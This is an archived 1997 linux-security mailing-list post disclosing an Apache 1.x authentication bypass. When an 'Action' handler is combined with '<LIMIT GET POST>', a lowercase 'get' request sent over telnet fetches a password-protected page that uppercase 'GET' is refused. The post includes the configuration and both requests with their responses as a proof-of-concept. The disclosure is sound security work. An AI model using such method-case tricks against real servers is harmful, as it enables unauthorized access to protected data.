[1599] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

[linux-security] Security Hole. Appache.

daemon@ATHENA.MIT.EDU (Kirjushka)
Thu Sep 4 03:49:22 1997

Date: Thu, 4 Sep 1997 00:25:40 +0400 (MSD)
From: Kirjushka <kir@fipc.ru>
Reply-To: Kirjushka <kir@fipc.ru>
To: linux-security@redhat.com
Resent-From: linux-security@redhat.com


Sorry! Unknown (for me) behaviour of Apache was discovered. Suddenly.

Configuration detail:
Linux:  2.0.30
Apache: 1.x.x

srm.conf:
        ...
        Action text/html /cgi-bin/exefile
        ...

/www-root/sec-dir/.htaccess:
        AuthType        Basic
        AuthName        authname
        AuthUserFile /itc/passwd
        <LIMIT GET POST>
        require valid-user
        </LIMIT>





Trying to "GET" and "get" some file from /www-root/sec-dir/ ...
----------------------------------------
Example #1:

$telnet www.host 80
GET /sec-dir/index.html http/1.1

HTTP/1.1 401 Authorization Required
..............

        It's OK!
-----------------------------------------
Example #2:

$telnet www.host 80
get /sec-dir/index.html http/1.1

HTTP/1.1 200 OK
...........

        It's quite OK for browser which doesn't know lower case "get".
-----------------------------------------

This feature disappears if you comment 'Action' or '<LIMIT>' lines.

        Sorry again! Kir.


home help back first fref pref prev next nref lref last post